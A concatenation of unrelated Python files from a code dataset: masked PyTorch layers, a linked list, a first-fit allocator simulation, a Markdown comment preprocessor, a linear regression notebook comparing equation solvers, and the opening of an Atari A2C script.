class MaskLayerNorm1d(nn.LayerNorm):
"""
Custom masked layer-norm layer
"""
def forward(self, inp: tuple):
x, mask = inp
batch_size, num_channels, num_tokens = x.shape
reshaped_mask = mask[:, None]
sum_dims = list(range(len(x.shape)))[1:]
xsum = x.sum(dim=sum_dims, keepdims=True)
xxsum = (x * x).sum(dim=sum_dims, keepdims=True)
numel_notnan = reshaped_mask.sum(dim=sum_dims, keepdims=True) * num_channels
xmean = xsum / numel_notnan
xxmean = xxsum / numel_notnan
var = xxmean - (xmean * xmean)
std = var.clamp(self.eps) ** 0.5
ratio = self.weight / std
output = (x - xmean) * ratio + self.bias
return output, mask
class MaskBatchNormNd(nn.BatchNorm1d):
"""n-dimensional batchnorm that excludes points outside the mask from the statistics"""
def forward(self, inp):
"""input (*, c), (*,) computes statistics averaging over * within the mask"""
x, mask = inp
sum_dims = list(range(len(x.shape)))[:-1]
x_or_zero = torch.where(
mask.unsqueeze(-1) > 0, x, torch.zeros_like(x)
) # remove nans
if self.training or not self.track_running_stats:
xsum = x_or_zero.sum(dim=sum_dims)
xxsum = (x_or_zero * x_or_zero).sum(dim=sum_dims)
numel_notnan = (mask).sum()
xmean = xsum / numel_notnan
sumvar = xxsum - xsum * xmean
unbias_var = sumvar / (numel_notnan - 1)
bias_var = sumvar / numel_notnan
self.running_mean = (
1 - self.momentum
) * self.running_mean + self.momentum * xmean.detach()
self.running_var = (
1 - self.momentum
) * self.running_var + self.momentum * unbias_var.detach()
else:
xmean, bias_var = self.running_mean, self.running_var
std = bias_var.clamp(self.eps) ** 0.5
ratio = self.weight / std
output = x_or_zero * ratio + (self.bias - xmean * ratio)
return (output, mask)
class mMaxPool1d(nn.MaxPool1d):
def __init__(self, *args, **kwargs):
super().__init__(*args, return_indices=True, **kwargs)
def forward(self, inp):
x, mask = inp
x = x * mask[:, None]
pooled_x, pool_ids = super().forward(x)
pooled_mask = (
mask[:, None].expand_as(x).gather(dim=2, index=pool_ids).any(dim=1)
)
# potential problem if largest non masked inputs are negative from previous layer?
return pooled_x, pooled_mask
class mAvgPool1d(nn.AvgPool1d):
def forward(self, inp):
x, mask = inp
naive_avg_x = super().forward(x)
avg_mask = super().forward(mask[:, None])
return naive_avg_x / (avg_mask + 1e-5), (avg_mask[:, 0] > 0).float()
@torch.jit.script
def fused_swish(x):
return x * x.sigmoid()
class mResidualBlock(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, layernorm, dropout_p=0.1, act_fn='swish', stride=1
):
super().__init__()
self.conv_1 = nn.Conv1d(
in_channels, out_channels, kernel_size, padding='same', stride=stride, bias=False
)
self.conv_2 = nn.Conv1d(
out_channels, out_channels, kernel_size, padding='same', stride=stride
)
if layernorm:
self.norm_1 = MaskLayerNorm1d(normalized_shape=[in_channels, 1])
self.norm_2 = MaskLayerNorm1d(normalized_shape=[out_channels, 1])
else:
self.norm_1 = MaskBatchNormNd(in_channels)
self.norm_2 = MaskBatchNormNd(out_channels)
if act_fn == 'swish':
self.act_fn = fused_swish
else:
self.act_fn = nn.ReLU(inplace=True)
if not in_channels == out_channels:
self.proj = nn.Conv1d(
in_channels, out_channels, kernel_size=1, padding='same', stride=1)
else:
self.proj = None
self.dropout = nn.Dropout(dropout_p)
def forward(self, inputs):
# assumes inputs are already properly masked
resid, mask = inputs
x, _ = self.norm_1((resid, mask))
x = mask[:, None] * x
x = self.act_fn(x)
x = self.conv_1(x)
x = mask[:, None] * x
x, _ = self.norm_2((x, mask))
x = mask[:, None] * x
x = self.act_fn(x)
x = self.conv_2(x)
if self.proj is not None:
resid = self.proj(resid)
x = mask[:, None] * (x + resid)
return self.dropout(x), mask
class mConvNormAct(nn.Module):
def __init__(self, in_channels, out_channels, layernorm=False, ksize=5, stride=1):
super().__init__()
self.conv = nn.Conv1d(
in_channels, out_channels, ksize, padding='same', stride=stride
)
if layernorm:
self.norm = MaskLayerNorm1d(normalized_shape=[out_channels, 1])
else:
self.norm = MaskBatchNormNd(out_channels)
def forward(self, inp):
x, mask = inp
x = self.conv(x)
x = mask[:, None] * x
x, _ = self.norm((x, mask))
x = mask[:, None] * x
x = fused_swish(x)
return x, mask
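# The modules above pass (tensor, mask) tuples through the network. A minimal
# illustrative stack (the shapes and channel counts are arbitrary examples, not
# taken from the original repository):
#   net = nn.Sequential(mConvNormAct(8, 16, layernorm=True),
#                       mResidualBlock(16, 16, kernel_size=5, layernorm=True))
#   x = torch.randn(4, 8, 32)    # (batch, channels, tokens)
#   mask = torch.ones(4, 32)     # 1 = valid token, 0 = padding
#   out, out_mask = net((x, mask))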
| 2.578125
| 3
|
Python/SinglyLinkedList.py
|
Nikhil-Sharma-1/DS-Algo-Point
| 1,148
|
12780138
|
class Node:
def __init__(self, data):
self.data = data
self.next = None
class SinglyLinkedList:
def __init__(self):
self.head = None
self.pos = None
def insert(self, data):
newNode = Node(data)
if self.head == None:
self.head = newNode
self.pos = newNode
else:
tmp = self.pos.next
self.pos.next = newNode
self.pos = newNode
if tmp != None:
newNode.next = tmp
def delete(self):
if self.pos == self.head:
self.pos = self.pos.next
del self.head
self.head = self.pos
else:
tmp = self.head
while tmp.next != self.pos:
tmp = tmp.next
tmp.next = self.pos.next
del self.pos
self.pos = tmp
def reset(self):
self.pos = self.head
def advance(self):
if self.pos != None:
self.pos = self.pos.next
def out_of_list(self):
if self.pos == None:
return True
else:
return False
def pos_position(self):
if not (self.out_of_list()):
return self.pos.data
else:
return "pos is out of list"
def print_list(self):
if self.head == None:
print("List is empty")
else:
tmp = self.head
while tmp != None:
print(tmp.data)
tmp = tmp.next
run = True
sll = SinglyLinkedList()
while run:
print( "\ni [insert] insert element")
print( "d [delete] delete element")
print( "o [out] out_of_list ?")
print( "p [pos] current position of pos")
print( "r [reset] pos-pointer")
print( "a [advance] pos-pointer")
print( "pr [print] print list")
print( "q [quit] program")
choice = input()
if choice == "i":
num = input("Enter Data for insertion: ")
sll.insert(num)
elif choice == "d":
sll.delete()
elif choice == "o":
print(sll.out_of_list())
elif choice == "r":
sll.reset()
elif choice == "a":
sll.advance()
elif choice == "p":
print(sll.pos_position())
elif choice == "q":
run = False
elif choice == "pr":
sll.print_list()
else:
print("Invalid Input")
"""
Sample I/O:
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
i (Userinput)
Enter Data for insertion: 10
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
i (Userinput)
Enter Data for insertion: 20
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
pr (Userinput)
10
20
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
p (Userinput)
20
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
a (Userinput)
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
o (Userinput)
True
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
r (Userinput)
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
p (Userinput)
10
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
d (Userinput)
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
pr (Userinput)
20
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
p (Userinput)
20
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
q (Userinput)
Time Complexity:
Insert: O(1)
Delete: O(N)
PrintList: O(N)
Everything Else: O(1)
"""
| 3.90625
| 4
|
Python/ds/Firstfit.py
|
Khushboo85277/NeoAlgo
| 897
|
12780139
|
"""
First fit is the simplest of all the storage allocation strategies.
Here the list of storage blocks is searched and, as soon as a free block of size >= N is found,
a pointer to that block is sent to the calling program while the residue space is retained. Thus, for example,
a request of 2k served from a block of size 5k sends 2k of memory to the caller and keeps the remaining 3k
as a fragment. The program below is a simulation of the first fit strategy using an array data structure.
"""
# Block class is used as the fixed memory blocks for allocation
class Block:
def __init__(self):
self.size = 0
self.ID = 0
self.fragment = 0
# process class is used for allocating memory for the requesting processes
class process:
def __init__(self):
self.Num = 0
self.size = 0
self.block = None
# initialiseBlocks function initializes all the blocks with sizes and id
def initialiseBlocks(arr, sizes, n):
for i in range(n):
arr[i].size = sizes[i]
arr[i].fragment = sizes[i]
arr[i].ID = i + 1
# printResult function prints the result of the memory allocation strategy
def printResult(arr2, numOfProcess):
print(
"Process No Process Size Block ID Block Size Block Fragment"
)
for i in range(numOfProcess):
print(
str(arr2[i].Num)
+ " "
+ str(arr2[i].size)
+ " "
+ str(arr2[i].block.ID)
+ " "
+ str(arr2[i].block.size)
+ " "
+ str(arr2[i].block.fragment)
)
# firstfit function allocates memory to processes using firstfit allocation algorithm
def firstfit(arr, sizes, n, arr2, numOfProcess):
initialiseBlocks(arr, sizes, n)
for i in range(numOfProcess):
for j in range(n):
if arr2[i].size <= arr[j].fragment:
arr[j].fragment -= arr2[i].size
arr2[i].block = Block()
arr2[i].block.size = arr[j].size
arr2[i].block.ID = arr[j].ID
arr2[i].block.fragment = arr[j].fragment
break
print("First Fit Allocation")
printResult(arr2, numOfProcess)
# Driver code
if __name__ == "__main__":
sizes = [60, 20, 12, 35, 64, 42, 31, 35, 40, 50]
arr = []
for i in range(10):
arr.append(Block())
initialiseBlocks(arr, sizes, 10)
numOfProcess = int(
input("Enter the number of process for memory to be allocated : ")
)
print("Enter the sizes required by the processes in the order of requirement")
psize = list(map(int, input().split(" ")))
arr2 = []
for i in range(numOfProcess):
arr2.append(process())
arr2[i].size = psize[i]
arr2[i].Num = i + 1
firstfit(arr, sizes, 10, arr2, numOfProcess)
"""
Sample I/O:
Enter the number of process for memory to be allocated : 5
Enter the sizes required by the processes in the order of requirement
15 12 13 20 11
First Fit Allocation
Process No Process Size Block ID Block Size Block Fragment
1 15 1 60 45
2 12 1 60 33
3 13 1 60 20
4 20 1 60 0
5 11 2 20 9
Time complexity : O(n)
space complexity : O(n)
"""
| 4.03125
| 4
|
verto/processors/CommentPreprocessor.py
|
uccser/verto
| 4
|
12780140
|
from markdown.preprocessors import Preprocessor
import re
class CommentPreprocessor(Preprocessor):
''' Searches a Document for comments (e.g. {comment example text here})
and removes them from the document.
'''
def __init__(self, ext, *args, **kwargs):
'''
Args:
ext: An instance of the Markdown parser class.
'''
super().__init__(*args, **kwargs)
self.processor = 'comment'
self.pattern = re.compile(ext.processor_info[self.processor]['pattern'])
def test(self, lines):
'''Return whether the provided document contains comments needing removal.
Args:
lines: A string of Markdown text.
Returns:
True if the document needs to be processed.
'''
return self.pattern.search(lines) is not None
def run(self, lines):
''' Removes all instances of text that match the following
example {comment example text here}. Inherited from
Preprocessor class.
Args:
lines: A list of lines of the Markdown document to be converted.
Returns:
Markdown document with comments removed.
'''
for i, line in enumerate(lines):
lines[i] = re.sub(self.pattern, '', line)
return lines
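# Illustrative behaviour, assuming the extension's processor_info supplies a
# pattern along the lines of r'\{comment [^\}]*\}' (the exact pattern lives in
# the Verto processor configuration, not in this file):
#   input line:  'Some text {comment remove me} and more text'
#   output line: 'Some text  and more text'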
| 3.296875
| 3
|
LinearRegression/LinearRegression.py
|
saurabbhsp/machineLearning
| 3
|
12780141
|
# coding: utf-8
# In[1]:
get_ipython().run_cell_magic('javascript', '', '<!-- Ignore this block -->\nIPython.OutputArea.prototype._should_scroll = function(lines) {\n return false;\n}')
# ## Use housing data
# I have loaded the required modules. Pandas and Numpy. I have also included sqrt function from Math library.<br>
# I have imported division from future library. Remove this if the code is executed on Python 3. This import mimics behaviour of division operator of python 3 on python 2
# In[2]:
import pandas as pd
import numpy as np
from __future__ import division
from math import sqrt
""" File path change accordingly"""
inputFilepath = "data/house.csv"
"""Using default seperator"""
housingData = pd.read_csv(inputFilepath)
housingData.head(10)
# ### TextEncoder
#
# Here the data is a mix of numbers and text. Text values cannot be used directly and should be converted to numeric data.<br>
# For this I have created a function textEncoder which accepts a pandas series. The text encoder returns a lookup dictionary (for recreating the numeric value of a text value) and the encoded text vector.
# For encoding I have applied a lambda function that returns the value from the dictionary.
# In[3]:
""" Converts the text features into numeric values so that they can be used by
the downstream algorithms.
Accepts pandas series and returns lookup dictionary and encoded vector"""
def textEncoder(textVector):
if type(textVector) == pd.core.series.Series:
lookUpDictionary = {}
lookupValue = 1
for key in textVector.unique():
lookUpDictionary[key] = lookupValue
lookupValue +=1
textVector = textVector.apply(lambda a: lookUpDictionary[a])
return lookUpDictionary,textVector
else:
raise TypeError("Expected a pandas series as an input")
# I have encoded the nbhd and brick columns using the text encoder. The lookup dictionary is not used in the downstream code. However, any future predictions will require text data to be encoded, and hence I have provided the lookup dictionary.
# In[4]:
nbhdFeatureLookup, housingData['nbhd'] = textEncoder(housingData['nbhd'])
brickFeatureLookup, housingData['brick'] = textEncoder(housingData['brick'])
housingData.head(10)
# ### SplitDataSet Procedure
# This method splits the dataset into a train set and a test set based upon the trainSetSize value. For splitting the dataset, I am using pandas.sample. This gives me the train set. For the test set I am calculating the complement of the train set, which I am doing by dropping the indices present in the training set.
# In[5]:
"""Splits the provided pandas dataframe into training and test dataset"""
def splitDataSet(inputDataframe, trainSetSize):
trainSet = inputDataframe.sample(frac=trainSetSize)
testSet = inputDataframe.drop(trainSet.index)
return trainSet,testSet
# ## 2. Choose those columns, which can help you in prediction i.e. contain some useful information. You can drop irrelevant columns. Give reason for choosing or dropping any column.
# ### generatePearsonCoefficient Procedure
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/f76ccfa7c2ed7f5b085115086107bbe25d329cec" />
# For sample:-
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/bd1ccc2979b0fd1c1aec96e386f686ae874f9ec0" />
# For selecting some features and for dropping others I am using Pearson's Coefficient. The value of Pearson's coefficient lies between [-1, 1] and tells how two features are related<br>
# <table>
# <tr><td>Strength of Association</td><td>Positive</td><td>Negative</td></tr><tr><td>Small</td><td>.1 to .3 </td><td>-0.1 to -0.3 </td></tr><tr><td>Medium</td><td>.3 to .5 </td><td>-0.3 to -0.5 </td></tr><tr><td>Large</td><td>.5 to 1.0 </td><td>-0.5 to -1.0 </td></tr></table>
#
# In[6]:
"""Generate pearson's coefficient"""
def generatePearsonCoefficient(A, B):
A_meanDiff = A - A.mean()
B_meanDiff = B - B.mean()
return ((A_meanDiff * B_meanDiff).sum())/(sqrt((
A_meanDiff * A_meanDiff).sum()) * sqrt((B_meanDiff * B_meanDiff).sum()))
# In[7]:
"""Generate the value of pearson constant for all the features"""
print("Pearson's coefficient of correlation for "+
"nbhd and price is "+ str(generatePearsonCoefficient(housingData.nbhd,housingData.price)))
print("Pearson's coefficient of correlation for "+
"offers and price is "+ str(generatePearsonCoefficient(housingData.offers,housingData.price)))
print("Pearson's coefficient of correlation for "+
"sqft and price is "+ str(generatePearsonCoefficient(housingData.sqft,housingData.price)))
print("Pearson's coefficient of correlation for "+
"bedrooms and price is "+ str(generatePearsonCoefficient(housingData.bedrooms,housingData.price)))
print("Pearson's coefficient of correlation for "+
"bathrooms and price is "+ str(generatePearsonCoefficient(housingData.bathrooms,housingData.price)))
print("Pearson's coefficient of correlation for "+
"brick and price is "+ str(generatePearsonCoefficient(housingData.brick,housingData.price)))
# The value of Pearson's coefficient suggests that sqft, bedrooms and bathrooms have a strong correlation with price. Offers has a weak negative correlation, and nbhd and brick have a medium correlation with price. I am keeping all the features as they all have some correlation with the target.
# # Visualizing the relation between the X and Y
# Here I have used subplots to plot different X features and their relation with Y.
# In[8]:
import matplotlib.pyplot as plt
"""Set global rcParams for pyplotlib"""
plt.rcParams["figure.figsize"] = "18,15"
figure, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(3,2,sharey='none')
ax1.plot(housingData.nbhd,housingData.price,"ro")
ax1.grid()
ax1.set_title("nbhd vs price")
ax2.plot(housingData.offers,housingData.price,"ro")
ax2.grid()
ax2.set_title("no of offers vs price")
ax3.plot(housingData.sqft,housingData.price,"ro")
ax3.grid()
ax3.set_title("sqft vs price")
ax4.plot(housingData.brick,housingData.price,"ro")
ax4.grid()
ax4.set_title("brick vs price")
ax5.plot(housingData.bedrooms,housingData.price,"ro")
ax5.grid()
ax5.set_title("no of bedrooms vs price")
ax6.plot(housingData.bathrooms,housingData.price,"ro")
ax6.grid()
ax6.set_title("bathrooms vs price")
plt.show()
# ### gaussianSolverProcedure
# <b>Algorithm:-</b><br>
# <b>Step-1</b><br>
# Generate an augmented matrix.<br>
# <b>Step-2</b><br>
# Calculate the pivot for a given column. The pivot is defined as the largest value in the column at or below the current index.<br>
# <b>Step-3</b><br>
# Place the pivot in the current row (swap the rows).<br>
# <b>Step-4</b><br>
# Make the other elements below the pivot zero, using only row operations. Repeat this until we get an upper triangular matrix.<br>
# <b>Step-5</b><br>
# Solve the upper triangular matrix using backward substitution.<br><br>
#
# The gaussian solver accepts two matrices A and B and tries to solve for x such that Ax = B
#
# In[9]:
"""Method for solving system of linear equations using gaussian elimination method"""
def gaussianSolver(A,B):
augmentedMatrix = np.hstack((A,B)) * 1.0
n = augmentedMatrix.shape[0]
for i in range(0, n):
"""Set default pivot value as diagonal matrix """
pivot = augmentedMatrix[i][i]
pivotRow = i
"""Check for a bigger pivot value"""
for j in range(i+1, n):
if abs(augmentedMatrix[j][i]) > abs(pivot):
pivot = augmentedMatrix[j][i]
pivotRow = j
"""If pivot has changed. Swap the rows"""
if pivotRow != i:
for j in range(0, n+1):
augmentedMatrix[pivotRow][j], augmentedMatrix[i][j] = augmentedMatrix[i][j], augmentedMatrix[pivotRow][j]
"""Make all the column values below pivot as zero by performing matrix row operations"""
for j in range(i+1, n):
op = -1 * (augmentedMatrix[j][i]/augmentedMatrix[i][i])
for k in range(0, n+1):
augmentedMatrix[j][k] = augmentedMatrix[j][k] + ( op * augmentedMatrix[i][k] )
""" Backward substitution to get values for B"""
beta = np.zeros(n)
for i in range(n - 1, -1,-1):
diff = 0
for k in range (i + 1, n):
diff = diff + (beta[k] * augmentedMatrix[i][k])
beta[i] = (augmentedMatrix[i][n] - diff)/augmentedMatrix[i][i]
return beta
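# A quick hand-checkable example of the solver above (the numbers are chosen
# here for illustration and are not part of the original notebook):
# gaussianSolver(np.array([[2., 1.], [1., 3.]]), np.array([[5.], [10.]]))
# returns approximately [1., 3.], since 2*1 + 1*3 = 5 and 1*1 + 3*3 = 10.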
# ### choleskyDecompositionSolver Procedure
# As per the Cholesky decomposition, a positive definite matrix A can be represented as L.L<sup>T</sup> where L is a lower triangular matrix and L<sup>T</sup> is its transpose.<br>
# Here L is called cholesky factor<br>
# The problem comes down to L.L<sup>T</sup>x = B<br>
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/abf826b0ffb86e190d432828d7485f52f618eaed" />
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/bb5adc5916e0762b2eca921de3e70ccae9bd2999" />
#
# <b>Algorithm:-</b><br>
# <b>Step-1</b><br>
# Initialize a zero matrix<br>
# <b>Step-2</b><br>
# Calculate L using the above formula. If calculating a diagonal element, stop the procedure and move on to the next row. This will generate the lower triangular matrix.<br/>
# <b>Step-3</b><br>
# Calculate vector Y using forward substitution. LY = b<br>
# <b>Step-4</b><br>
# Calculate vector X using backward substitution: L<sup>T</sup>X = Y<br>
# In[10]:
"""Method for solving the system of linear equations using cholesky decomposition"""
def choleskyDecompositionSolver(A, B):
"""Converting the matrix values to float"""
A = A * 1.0
B = B * 1.0
n = A.shape[0]
if A.shape[0] == A.shape[1]:
"""Generate cholesky factor"""
L = np.zeros(shape = A.shape)
for i in range(0, n):
for j in range (0, n):
L[i][j] = A[i][j]
"""Calculating diagonal elements"""
if i == j:
for k in range(0, j):
L[i][j] = L[i][j] - (L[i][k] * L[i][k])
L[i][j] = sqrt(L[i][j])
break;
"""Calculating non diagonal elements"""
product = 0
for k in range (0, j):
product = product + (L[i][k] * L[j][k])
L[i][j] = (L[i][j] - product)/L[j][j]
"""Solving the system of linear equation
Ax=b
A can be decomposed into LU such that
Ly=b
Ux=y """
"""Forward substitution"""
Y = np.zeros(n)
for i in range(0, n):
diff = 0
for k in range (i -1, -1, -1):
diff = diff + (Y[k] * L[i][k])
Y[i] = (B[i] - diff)/L[i][i]
"""Backward substitution"""
beta = np.zeros(n)
U = L.T
for i in range(n - 1, -1,-1):
diff = 0
for k in range (i + 1, n):
diff = diff + (beta[k] * U[i][k])
beta[i] = (Y[i] - diff)/U[i][i]
return beta
else:
        raise ValueError("Matrix A is not square")
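# A quick hand-checkable example for the Cholesky solver (illustrative numbers,
# not part of the original notebook; A is symmetric positive definite):
# choleskyDecompositionSolver(np.array([[4., 2.], [2., 3.]]), np.array([[10.], [9.]]))
# returns approximately [1.5, 2.], since 4*1.5 + 2*2 = 10 and 2*1.5 + 3*2 = 9.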
# ### qrDecompositionSolver Procedure
# A matrix A can be represented as product of Q and R where Q is orthogonal matrix (Q<sup>T</sup>Q = QQ<sup>T</sup> = I) and R is upper triangular matrix.
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/4b845398dd7df51edc31561a612423b20a83eb04" />
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/74356955f03f5c1171e9e812174a715eb112aef8" />
# <br>QR decompsition can be done in four steps
# <ul><li>Calculation of orthogonal basis</li><li>Calculation of orthonormal</li><li>QR factor calculation</li><li>Solving system of linear equation</li></ul>
# <br>
# <b>Algorithm:-</b><br>
# <b>Step-1</b><br>
# Calculate the orthogonal basis using the Gram-Schmidt method. For the first vector the value is the vector itself. For subsequent vectors the orthogonal basis is the vector minus its projections onto the previously calculated orthogonal basis vectors.
# <br><b>Step-2</b><br>
# For calculating the orthonormal basis we divide each orthogonal basis vector by its magnitude.
# <br><b>Step-3</b><br>
# Q = [orthonormalBasis]<br>
# R = Q<sup>T</sup>A
# <br><b>Step-4</b><br>
# For calculating the value of X in AX = B,<br>
# We calculate Y = Q<sup>T</sup>B<br>
# We solve RX = Y using backward substitution
#
# In[11]:
"""QR decomposition can be done in three steps
1) Calculation orthogonal basis
2) Calculation orthonormal
3) QR factor calculation"""
def qrDecompositionSolver(A, B):
A = A * 1.0
B = B * 1.0
"""Calculating the orthogonal basis"""
n = A.shape[1]
# Store deepcopy of A for processing
orthoBasis = np.array(A, copy = True)
for i in range(1, n):
"""Calculate the projections"""
diff = 0
for j in range(i-1, -1, -1):
diff = diff + (np.dot(orthoBasis[:,i],
orthoBasis[:,j])/np.dot(orthoBasis[:,j],orthoBasis[:,j]))*orthoBasis[:,j]
orthoBasis[:,i] = orthoBasis[:,i] - diff
"""Calculating orthonormal"""
for i in range(0, n):
orthoBasis[:,i] = orthoBasis[:,i]/np.sqrt(np.sum(np.square(orthoBasis[:,i])))
"""QR factorization"""
Q = orthoBasis
R = np.dot(orthoBasis.T,A)
"""Solving system of linear equation"""
B = np.dot(Q.T,B)
"""Backward substitution"""
beta = np.zeros(n)
for i in range(n - 1, -1,-1):
diff = 0
for k in range (i + 1, n):
diff = diff + (beta[k] * R[i][k])
beta[i] = (B[i] - diff)/R[i][i]
return beta
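# A quick hand-checkable example for the QR solver (illustrative numbers, not
# part of the original notebook):
# qrDecompositionSolver(np.array([[1., 2.], [3., 4.]]), np.array([[5.], [11.]]))
# returns approximately [1., 2.], since 1*1 + 2*2 = 5 and 3*1 + 4*2 = 11.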
# ### learnLinregNormEq
# Solves the system of linear equations of the form <br>
# X<sup>T</sup>XB = X<sup>T</sup>Y<br>
# Accepts three arguments X, Y and solver. Default value for solver is gaussianSolver
# In[12]:
"""Method to learn linear regression using normal equations. Default solver is
gaussian solver"""
def learnLinregNormEq(X, Y, solver = gaussianSolver):
if isinstance(X,np.ndarray) and isinstance(Y,np.ndarray):
if X.shape[0] != Y.shape[0]:
raise ValueError("The shape of X and Y is inconsistant")
X = np.insert(X, 0, 1, axis=1)
Xtranspose = X.T
XtX = np.dot(Xtranspose,X)
XtY = np.dot(Xtranspose,Y)
return solver(XtX, XtY)
else:
raise TypeError("Expected X and Y as numpy.ndarray")
# ### predictLinearRegression Procedure
# This method predicts the value of Y given X and the model parameters. This method will add the bias term to X.
# In[13]:
"""Method to make prediction for yTest"""
def predictionLinearRegression(X, modelParameters):
X = np.insert(X, 0, 1, axis=1)
yPrediction = np.dot(X,modelParameters.T)
return yPrediction
# ### RMSE procedure
# Will calculate root mean squared error for given Ytrue values and YPrediction
#
# In[14]:
"""Model accuracy estimator RMSE"""
def RMSE(yTrue, yPrediction):
n = yTrue.shape[0]
    # RMSE = sqrt( (1/n) * sum((yTrue - yPrediction)^2) )
    return sqrt(np.sum(np.square(yTrue - yPrediction)) / n)
# # Solving the linear equations using gaussianSolver
# Here I am splitting the dataset into training and test set. For this I am using splitDataSet procedure with 80-20 split.<br>
# I have taken all the features.
# In[15]:
trainSet,testSet = splitDataSet(housingData,0.8)
Ytrain = trainSet.as_matrix(columns=['price'])
Ytest = testSet.as_matrix(columns=['price'])
print("Total items in training set "+str(Ytrain.shape))
print("Total items in test set "+str(Ytest.shape))
Xtrain = trainSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
Xtest = testSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
# I am learning linear regression using default (Gaussian) solver. I am making predictions using predictionLinearRegression procedure. I am calculating the RMSE using RMSE procedure and average of residuals using mean.
# In[16]:
"""Learn model parameters using gaussian solver"""
modelParamsGaussian = learnLinregNormEq(Xtrain, Ytrain)
"""Make prediction using modelParams"""
yPredictionGaussian = predictionLinearRegression(Xtest, modelParamsGaussian)
"""Calculate RMSE"""
print("RMSE for gaussian solver is "+str(RMSE(Ytest.flatten(),yPredictionGaussian)))
print("Average residual for gaussian solver is "+str((Ytest.flatten() - yPredictionGaussian).mean()))
# In[17]:
plt.plot(yPredictionGaussian - Ytest.flatten(), Ytest,"ro",label="ytest - ybar vs ytest")
plt.title("Plot for gaussian solver")
plt.xlabel("ytest - ybar")
plt.ylabel("ytest")
plt.show()
# # Solving the system of equations using Cholesky method
# In[18]:
trainSet,testSet = splitDataSet(housingData,0.8)
Ytrain = trainSet.as_matrix(columns=['price'])
Ytest = testSet.as_matrix(columns=['price'])
print("Total items in training set "+str(Ytrain.shape))
print("Total items in test set "+str(Ytest.shape))
Xtrain = trainSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
Xtest = testSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
# In[19]:
"""Learn model parameters using Cholesky solver"""
modelParamsCholesky = learnLinregNormEq(Xtrain, Ytrain,choleskyDecompositionSolver)
"""Make prediction using modelParams"""
yPredictionCholesky = predictionLinearRegression(Xtest, modelParamsCholesky)
"""Calculate RMSE"""
print("RMSE for Cholesky solver is "+str(RMSE(Ytest.flatten(),yPredictionCholesky)))
print("Average residual for Cholesky solver is "+str((Ytest.flatten() - yPredictionCholesky).mean()))
# In[20]:
plt.plot(yPredictionCholesky - Ytest.flatten(), Ytest,"bo",label="ytest - ybar vs ytest")
plt.title("Plot for Cholesky solver")
plt.xlabel("ytest - ybar")
plt.ylabel("ytest")
plt.show()
# # Solving the system of equations using QR decomposition method
# In[21]:
trainSet,testSet = splitDataSet(housingData,0.8)
Ytrain = trainSet.as_matrix(columns=['price'])
Ytest = testSet.as_matrix(columns=['price'])
print("Total items in training set "+str(Ytrain.shape))
print("Total items in test set "+str(Ytest.shape))
Xtrain = trainSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
Xtest = testSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
# In[22]:
"""Learn model parameters using QR Decomposition solver"""
modelParamsQR = learnLinregNormEq(Xtrain, Ytrain,qrDecompositionSolver)
"""Make prediction using modelParams"""
yPredictionQR = predictionLinearRegression(Xtest, modelParamsQR)
"""Calulate RMSE"""
print("RMSE for QR Decomposition solver is "+str(RMSE(Ytest.flatten(),yPredictionQR)))
print("Average residual for QR Decomposition solver is "+str((Ytest.flatten() - yPredictionQR).mean()))
# In[23]:
plt.plot(yPredictionQR - Ytest.flatten(), Ytest,"go",label="ytest - ybar vs ytest")
plt.title("Plot for QR decomposition solver")
plt.xlabel("ytest - ybar")
plt.ylabel("ytest")
plt.show()
| 3.40625
| 3
|
atari_a2c.py
|
godka/mario_rl
| 0
|
12780142
|
<filename>atari_a2c.py
import gym
import os
import random
from itertools import chain
import numpy as np
import torch.nn.functional as F
import torch.nn as nn
import torch
from torch.distributions import Categorical
import cv2
from model import *
import torch.optim as optim
from torch.multiprocessing import Pipe, Process
from collections import deque
from tensorboardX import SummaryWriter
class AtariEnvironment(Process):
def __init__(
self,
env_id,
is_render,
env_idx,
child_conn,
history_size=4,
h=84,
w=84):
